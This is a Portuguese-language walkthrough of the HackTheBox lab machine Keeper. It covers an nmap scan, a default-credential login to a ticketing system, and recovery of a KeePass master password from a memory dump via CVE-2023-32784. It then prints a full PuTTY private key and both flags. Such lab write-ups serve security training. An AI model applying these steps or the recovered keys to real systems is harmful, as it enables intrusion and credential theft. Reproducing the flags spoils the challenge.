Neste writeup iremos explorar uma máquina easy chamada Keeper que explora as seguintes vulnerabilidades e técnicas.
- Defaul Credentials
- CVE-2023-32784
Recon e User Flag
Vamos iniciar realizando uma varredura nas portas utilizando o nmap:
┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper] └─# nmap -sV --open -Pn -sC 10.129.122.191 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 15:04 EDT Nmap scan report for 10.129.122.191 Host is up (0.27s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA) |_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Site doesn't have a title (text/html). |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Ao acessar pelo navegador na porta 80 nos é exibido uma mensagem informando para acessar:
Para isso vamos inserir em nosso /etc/hosts tickets.keeper.htb.
E aqui temos a seguinte página de login:
Se trata de um acesso ao sistema de tickets “Best Practical Solutions”. Também temos a informação do sistema operacional:
RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC. Buscando na documentação deste sistema de ticket conseguimos o acesso admin utilizando as credenciais default:
- user: root
- pass: password
Agora precisamos analisar o que conseguimos de informações!
Visualizando os usuários conseguimos encontrar em uma sessão de comentários que nos informa uma senha:
E com essa senha conseguimos acesso com o usuário lnorgaard, que possui a user flag!
┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/wifinetictwo] └─# ssh lnorgaard@10.129.122.191 ... .... lnorgaard@keeper:~$ ls -a . .. .bash_history .bash_logout .bashrc .cache .profile RT30000.zip .ssh user.txt .vimrc lnorgaard@keeper:~$ cat user.txt 9b2190c26059e89932dab94b1d8915b5 Escalação de privilégios e Root Flag
Ainda analisando o sistema de tickets notamos que existe um que nos chama atenção. É uma interação entre o usuário root e o usuário lnorgaard.
Esse ticket informa que o usuário root teve problemas com seu KeePass e disponibilizou um dump de memória para que seja analisado. O usuário lnorgaard informa que como é inseguro inserir esse tipo de informação em anexo o arquivo removido e adicionado em sua home.
Voltando para nosso acesso ssh encontramos o arquivo em questão. Ele esta compactado:
/home/lnorgaard/RT30000.zip Descompactando esse arquivo temos dois arquivos:
- KeePassDumpFull.dmp
- passcodes.kdbx
O primeiro arquivo é um Mini DuMP crash report, basicamente um dump de memória do windows.
Já o segundo é um arquivo do KeePass que armazena secrets.
Existem diversas vulnerabilidades que forma reportadas no KeePass recentemente, dentre elas temos a CVE-2023-32784. Essa vulnerabilidade permite que seja recuperada a senha em texto plano da memória (Vulnerabilidade ja explorada na máquina Mailroom).
Como temos o arquivo de dump podemos buscar extrair a senha do mesmo.
Podemos confirmar que o arquivo de dump possui a execução através do radare:
[0x00704fde]> iSq~exe 0x610000 0x92a000 ---- C:\Program Files\KeePass Password Safe 2\KeePass.exe Para realizar a extração das credenciais iremos utilizar um exploit público feito em dotnet:
https://github.com/vdohney/keepass-password-dumper
Para realizar os procedimentos precisamos realizar o download de ambos os arquivos para nossa máquina local, visto que não temos permissão ou pacotes necessários para realizar os procedimentos a seguir no alvo.
Localmente iremos executar o exploit (lembrando que é precise ter o dotnet 7.0):
┌──(root㉿kali)-[/home/…/hackthebox/machines-linux/keeper/keepass-password-dumper] └─# dotnet run ../KeePassDumpFull.dmp Found: ●●d Found: ●●d ... Password candidates (character positions): Unknown characters are displayed as "●" 1.: ● 2.: ,, l, `, -, ', ], A, I, :, =, _, c, M, 3.: d, 4.: g, 5.: r, 6.: ● 7.: d, 8.: , 9.: m, 10.: e, 11.: d, 12.: , 13.: f, 14.: l, 15.: ● 16.: d, 17.: e, Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de Acima temos um resultado um tanto quanto estranho:
●dgr●d med fl●de Mas pesquisando isso no google temos o seguinte resultado:
Rodgrod med flod é um um pudim dinamarquês e se escreve da seguinte forma usando o alfabeto dinamarquês, que é o alfabeto romano completo. Onde existem mais três letras próprias (Æ, Ø, Å), com nossa resposta da seguinte forma:
rødgrød med fløde Que podemos confirmar ser a senha de acesso ao arquivo do KeePass utilizando o kpcli:
┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper] └─# kpcli --kdb passcodes.kdbx Provide the master password: ************************* KeePass CLI (kpcli) v3.8.1 is ready for operation. Type 'help' for a description of available commands. Type 'help <command>' for details on individual commands. kpcli:/> Analisando o conteúdo deste cofre encontramos os dados de acesso do usuário root:
kpcli:/> ls === Groups === passcodes/ kpcli:/> ls passcodes === Groups === eMail/ General/ Homebanking/ Internet/ Network/ Recycle Bin/ Windows/ kpcli:/> ls passcodes/Network === Entries === 0. keeper.htb (Ticketing Server) 1. Ticketing System kpcli:/> show -f 0 Title: keeper.htb (Ticketing Server) Uname: root Pass: F4><3K0nd! URL: Notes: PuTTY-User-Key-File-3: ssh-rsa Encryption: none Comment: rsa-key-20230519 Public-Lines: 6 AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D 8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et Private-Lines: 14 AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV 09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is= Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0 Encontramos usuário, senha e chave do putty do usuário root. No entanto a senha não esta funcional via ssh ou via su.
Mas temos uma chave ppk em nosso vault, vamos salvar em um arquivo em nossa máquina local:
┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper] └─# cat root.ppk PuTTY-User-Key-File-3: ssh-rsa Encryption: none Comment: rsa-key-20230519 Public-Lines: 6 AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D 8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et Private-Lines: 14 AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV 09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is= Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0 Agora iremos converter a chave ppk do putty para um private key (pem) para acessarmos:
┌──(root㉿kali)-[~] └─# puttygen root.ppk -O private-openssh -o root-key.pem Com essa nova chave privada podemos acessar como usuário root, buscar a root flag e finalizar a máquina.
┌──(root㉿kali)-[~kali/hackthebox/machines-linux/keeper] └─# ssh -i keys/root-key.pem root@10.129.121.255 Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings You have new mail. Last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41 root@keeper:~# cat root.txt 2340facd7897eea0d3b6276c6f269f33 Com isso finalizamos a máquina Keeper!
Top comments (0)